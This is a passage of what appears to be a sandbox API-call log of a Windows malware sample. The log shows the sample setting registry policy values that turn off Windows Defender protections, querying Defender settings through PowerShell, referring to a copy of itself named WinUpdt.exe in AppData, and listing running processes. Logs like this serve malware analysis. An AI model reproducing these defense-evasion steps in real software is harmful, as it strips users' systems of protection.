lpcbData=0x39e77c*=0x0) returned 0x2 [0043.996] RegSetValueExW (in: hKey=0x350, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x39e79c*=0x1, cbData=0x4 | out: lpData=0x39e79c*=0x1) returned 0x0 [0043.996] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e764 | out: phkResult=0x39e764*=0x0) returned 0x2 [0043.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e728 | out: phkResult=0x39e728*=0x0) returned 0x2 [0043.997] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x39e724, lpdwDisposition=0x39e7ac | out: phkResult=0x39e724*=0x354, lpdwDisposition=0x39e7ac*=0x1) returned 0x0 [0043.997] RegQueryValueExW (in: hKey=0x354, lpValueName="DisableBehaviorMonitoring", lpReserved=0x0, lpType=0x39e780, lpData=0x0, lpcbData=0x39e77c*=0x0 | out: lpType=0x39e780*=0x0, lpData=0x0, lpcbData=0x39e77c*=0x0) returned 0x2 [0043.997] RegSetValueExW (in: hKey=0x354, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x39e79c*=0x1, cbData=0x4 | out: lpData=0x39e79c*=0x1) returned 0x0 [0043.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e764 | out: phkResult=0x39e764*=0x358) returned 0x0 [0043.997] RegQueryValueExW (in: hKey=0x358, lpValueName="DisableOnAccessProtection", lpReserved=0x0, lpType=0x39e798, lpData=0x0, lpcbData=0x39e794*=0x0 | out: lpType=0x39e798*=0x0, lpData=0x0, lpcbData=0x39e794*=0x0) returned 0x2 [0043.997] RegQueryValueExW (in: hKey=0x358, lpValueName="DisableOnAccessProtection", lpReserved=0x0, lpType=0x39e780, lpData=0x0, lpcbData=0x39e77c*=0x0 | out: lpType=0x39e780*=0x0, lpData=0x0, lpcbData=0x39e77c*=0x0) returned 0x2 [0043.997] RegSetValueExW (in: hKey=0x358, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x39e79c*=0x1, cbData=0x4 | out: lpData=0x39e79c*=0x1) returned 0x0 [0043.998] RegCloseKey (hKey=0x358) returned 0x0 [0043.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x39e764 | out: phkResult=0x39e764*=0x358) returned 0x0 [0043.999] RegQueryValueExW (in: hKey=0x358, lpValueName="DisableScanOnRealtimeEnable", lpReserved=0x0, lpType=0x39e798, lpData=0x0, lpcbData=0x39e794*=0x0 | out: lpType=0x39e798*=0x0, lpData=0x0, lpcbData=0x39e794*=0x0) returned 0x2 [0043.999] RegQueryValueExW (in: hKey=0x358, lpValueName="DisableScanOnRealtimeEnable", lpReserved=0x0, lpType=0x39e780, lpData=0x0, lpcbData=0x39e77c*=0x0 | out: lpType=0x39e780*=0x0, lpData=0x0, lpcbData=0x39e77c*=0x0) returned 0x2 [0043.999] RegSetValueExW (in: hKey=0x358, lpValueName="DisableScanOnRealtimeEnable", Reserved=0x0, dwType=0x4, lpData=0x39e79c*=0x1, cbData=0x4 | out: lpData=0x39e79c*=0x1) returned 0x0 [0043.999] RegCloseKey (hKey=0x358) returned 0x0 [0044.116] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0044.117] CreatePipe (in: hReadPipe=0x39e6a8, hWritePipe=0x39e6a4, lpPipeAttributes=0x39e628, nSize=0x0 | out: hReadPipe=0x39e6a8*=0x35c, hWritePipe=0x39e6a4*=0x360) returned 1 [0044.117] GetCurrentProcess () returned 0xffffffff [0044.117] GetCurrentProcess () returned 0xffffffff [0044.118] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x39e6ac, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x39e6ac*=0x364) returned 1 [0044.118] CloseHandle (hObject=0x35c) returned 1 [0044.118] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0044.118] CoTaskMemAlloc (cb=0x20e) returned 0x7e6d68 [0044.118] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7e6d68 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.118] CoTaskMemFree (pv=0x7e6d68) [0044.120] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"powershell\" Get-MpPreference -verbose", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x39e5e4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x360, hStdError=0x0), lpProcessInformation=0x22e716c | out: lpCommandLine="\"powershell\" Get-MpPreference -verbose", lpProcessInformation=0x22e716c*(hProcess=0x368, hThread=0x35c, dwProcessId=0x3b4, dwThreadId=0x600)) returned 1 [0044.243] CloseHandle (hObject=0x360) returned 1 [0044.292] GetFileType (hFile=0x364) returned 0x3 [0044.293] CloseHandle (hObject=0x35c) returned 1 [0044.300] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x4f, lpOverlapped=0x0) returned 1 [0053.536] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.543] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x4f, lpOverlapped=0x0) returned 1 [0053.563] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.572] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x3e, lpOverlapped=0x0) returned 1 [0053.592] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.601] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x11, lpOverlapped=0x0) returned 1 [0053.621] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.630] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x21, lpOverlapped=0x0) returned 1 [0053.649] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.658] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x4f, lpOverlapped=0x0) returned 1 [0053.679] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.688] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x19, lpOverlapped=0x0) returned 1 [0053.708] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.717] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x36, lpOverlapped=0x0) returned 1 [0053.736] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.745] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e764*=0x1, lpOverlapped=0x0) returned 1 [0053.765] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e754, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac*, lpNumberOfBytesRead=0x39e754*=0x1, lpOverlapped=0x0) returned 1 [0053.773] ReadFile (in: hFile=0x364, lpBuffer=0x22e7dac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x39e764, lpOverlapped=0x0 | out: lpBuffer=0x22e7dac, lpNumberOfBytesRead=0x39e764*=0x0, lpOverlapped=0x0) returned 0 [0054.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e298, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0054.050] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Rznd123\\local.exe", nBufferLength=0x105, lpBuffer=0x39e298, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\Rznd123\\local.exe", lpFilePart=0x0) returned 0x29 [0054.050] GetCurrentProcessId () returned 0x8e8 [0054.085] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e8) returned 0x35c [0054.099] EnumProcessModules (in: hProcess=0x35c, lphModule=0x22ed75c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x22ed75c, lpcbNeeded=0x39e760) returned 1 [0054.101] GetModuleInformation (in: hProcess=0x35c, hModule=0xe90000, lpmodinfo=0x22ed89c, cb=0xc | out: lpmodinfo=0x22ed89c*(lpBaseOfDll=0xe90000, SizeOfImage=0x1a000, EntryPoint=0xea40fe)) returned 1 [0054.101] CoTaskMemAlloc (cb=0x804) returned 0x7fa5c0 [0054.101] GetModuleBaseNameW (in: hProcess=0x35c, hModule=0xe90000, lpBaseName=0x7fa5c0, nSize=0x800 | out: lpBaseName="WinUpdt.exe") returned 0xb [0054.102] CoTaskMemFree (pv=0x7fa5c0) [0054.102] CoTaskMemAlloc (cb=0x804) returned 0x7fa5c0 [0054.102] GetModuleFileNameExW (in: hProcess=0x35c, hModule=0xe90000, lpFilename=0x7fa5c0, nSize=0x800 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\winupdt.exe")) returned 0x31 [0054.102] CoTaskMemFree (pv=0x7fa5c0) [0054.102] CloseHandle (hObject=0x35c) returned 1 [0054.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0054.103] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0055.111] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0056.127] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0057.140] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0058.153] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0059.168] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0060.197] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0061.211] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0062.234] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0063.257] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0064.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3aeaa70, Length=0x20000, ResultLength=0x39e768 | out: SystemInformation=0x3aeaa70, ResultLength=0x39e768*=0xd6a0) returned 0x0 [0064.297] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0064.298] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x230e7cc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x230e7cc, lpcbNeeded=0x39e760) returned 1 [0064.299] GetModuleInformation (in: hProcess=0x1e8, hModule=0x1050000, lpmodinfo=0x230e90c, cb=0xc | out: lpmodinfo=0x230e90c*(lpBaseOfDll=0x1050000, SizeOfImage=0x17000, EntryPoint=0x10514a1)) returned 1 [0064.299] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.299] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0x1050000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="dreams.exe") returned 0xa [0064.299] CoTaskMemFree (pv=0x7943e0) [0064.300] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.300] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0x1050000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\dreams.exe" (normalized: "c:\\program files (x86)\\windows mail\\dreams.exe")) returned 0x2e [0064.300] CoTaskMemFree (pv=0x7943e0) [0064.300] CloseHandle (hObject=0x1e8) returned 1 [0064.300] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d4) returned 0x1e8 [0064.300] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x2310bf0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2310bf0, lpcbNeeded=0x39e760) returned 1 [0064.301] GetModuleInformation (in: hProcess=0x1e8, hModule=0xf80000, lpmodinfo=0x2310d30, cb=0xc | out: lpmodinfo=0x2310d30*(lpBaseOfDll=0xf80000, SizeOfImage=0x17000, EntryPoint=0xf814a1)) returned 1 [0064.301] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.302] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xf80000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="filezilla.exe") returned 0xd [0064.302] CoTaskMemFree (pv=0x7943e0) [0064.302] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.302] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xf80000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\filezilla.exe" (normalized: "c:\\program files\\windows journal\\filezilla.exe")) returned 0x2e [0064.302] CoTaskMemFree (pv=0x7943e0) [0064.303] CloseHandle (hObject=0x1e8) returned 1 [0064.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.303] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x1e8 [0064.303] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x2313018, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2313018, lpcbNeeded=0x39e760) returned 1 [0064.304] GetModuleInformation (in: hProcess=0x1e8, hModule=0x1080000, lpmodinfo=0x2313158, cb=0xc | out: lpmodinfo=0x2313158*(lpBaseOfDll=0x1080000, SizeOfImage=0x17000, EntryPoint=0x10814a1)) returned 1 [0064.304] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.304] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0x1080000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="frederick gm.exe") returned 0x10 [0064.304] CoTaskMemFree (pv=0x7943e0) [0064.304] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.304] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0x1080000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Photo Viewer\\frederick gm.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\frederick gm.exe")) returned 0x3c [0064.305] CoTaskMemFree (pv=0x7943e0) [0064.305] CloseHandle (hObject=0x1e8) returned 1 [0064.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.305] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0064.305] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x2315464, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2315464, lpcbNeeded=0x39e760) returned 1 [0064.306] GetModuleInformation (in: hProcess=0x1e8, hModule=0xcb0000, lpmodinfo=0x23155a4, cb=0xc | out: lpmodinfo=0x23155a4*(lpBaseOfDll=0xcb0000, SizeOfImage=0x17000, EntryPoint=0xcb14a1)) returned 1 [0064.306] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.306] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xcb0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="smartftp.exe") returned 0xc [0064.306] CoTaskMemFree (pv=0x7943e0) [0064.306] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.306] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xcb0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Synchronization Services\\smartftp.exe" (normalized: "c:\\program files\\microsoft synchronization services\\smartftp.exe")) returned 0x40 [0064.307] CoTaskMemFree (pv=0x7943e0) [0064.307] CloseHandle (hObject=0x1e8) returned 1 [0064.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.307] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x1e8 [0064.307] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x23178b0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23178b0, lpcbNeeded=0x39e760) returned 0 [0064.307] GetCurrentProcessId () returned 0x8e8 [0064.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e4 [0064.327] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.327] IsWow64Process (in: hProcess=0x1e8, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.360] CloseHandle (hObject=0x1e4) returned 1 [0064.360] CloseHandle (hObject=0x1e8) returned 1 [0064.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x1e8 [0064.361] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x2318e80, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2318e80, lpcbNeeded=0x39e760) returned 1 [0064.361] GetModuleInformation (in: hProcess=0x1e8, hModule=0x340000, lpmodinfo=0x2318fc0, cb=0xc | out: lpmodinfo=0x2318fc0*(lpBaseOfDll=0x340000, SizeOfImage=0x17000, EntryPoint=0x3414a1)) returned 1 [0064.362] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.362] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0x340000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="trillian.exe") returned 0xc [0064.362] CoTaskMemFree (pv=0x7943e0) [0064.362] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.362] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0x340000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\trillian.exe" (normalized: "c:\\program files (x86)\\windows media player\\trillian.exe")) returned 0x38 [0064.363] CoTaskMemFree (pv=0x7943e0) [0064.363] CloseHandle (hObject=0x1e8) returned 1 [0064.363] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.363] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x1e8 [0064.363] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x231b2bc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x231b2bc, lpcbNeeded=0x39e760) returned 1 [0064.364] GetModuleInformation (in: hProcess=0x1e8, hModule=0xc60000, lpmodinfo=0x231b3fc, cb=0xc | out: lpmodinfo=0x231b3fc*(lpBaseOfDll=0xc60000, SizeOfImage=0x17000, EntryPoint=0xc614a1)) returned 1 [0064.364] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.364] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0xc60000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="ccv_server.exe") returned 0xe [0064.364] CoTaskMemFree (pv=0x7943e0) [0064.364] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.364] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0xc60000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\DVD Maker\\ccv_server.exe" (normalized: "c:\\program files\\dvd maker\\ccv_server.exe")) returned 0x29 [0064.365] CoTaskMemFree (pv=0x7943e0) [0064.365] CloseHandle (hObject=0x1e8) returned 1 [0064.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.365] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x1e8 [0064.365] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x231d6dc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x231d6dc, lpcbNeeded=0x39e760) returned 1 [0064.366] GetModuleInformation (in: hProcess=0x1e8, hModule=0x150000, lpmodinfo=0x231d81c, cb=0xc | out: lpmodinfo=0x231d81c*(lpBaseOfDll=0x150000, SizeOfImage=0x17000, EntryPoint=0x1514a1)) returned 1 [0064.366] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.366] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0x150000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="platinum-vertex-growth.exe") returned 0x1a [0064.366] CoTaskMemFree (pv=0x7943e0) [0064.366] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.366] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0x150000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Uninstall Information\\platinum-vertex-growth.exe" (normalized: "c:\\program files (x86)\\uninstall information\\platinum-vertex-growth.exe")) returned 0x47 [0064.367] CoTaskMemFree (pv=0x7943e0) [0064.367] CloseHandle (hObject=0x1e8) returned 1 [0064.367] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.367] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x1e8 [0064.367] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x231fb50, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x231fb50, lpcbNeeded=0x39e760) returned 1 [0064.368] GetModuleInformation (in: hProcess=0x1e8, hModule=0x980000, lpmodinfo=0x231fc90, cb=0xc | out: lpmodinfo=0x231fc90*(lpBaseOfDll=0x980000, SizeOfImage=0x17000, EntryPoint=0x9814a1)) returned 1 [0064.368] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.368] GetModuleBaseNameW (in: hProcess=0x1e8, hModule=0x980000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="is-ethiopia.exe") returned 0xf [0064.368] CoTaskMemFree (pv=0x7943e0) [0064.369] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.369] GetModuleFileNameExW (in: hProcess=0x1e8, hModule=0x980000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\is-ethiopia.exe" (normalized: "c:\\program files (x86)\\adobe\\is-ethiopia.exe")) returned 0x2c [0064.369] CoTaskMemFree (pv=0x7943e0) [0064.369] CloseHandle (hObject=0x1e8) returned 1 [0064.369] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.369] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x1e8 [0064.369] EnumProcessModules (in: hProcess=0x1e8, lphModule=0x2321f78, cb=0x100, 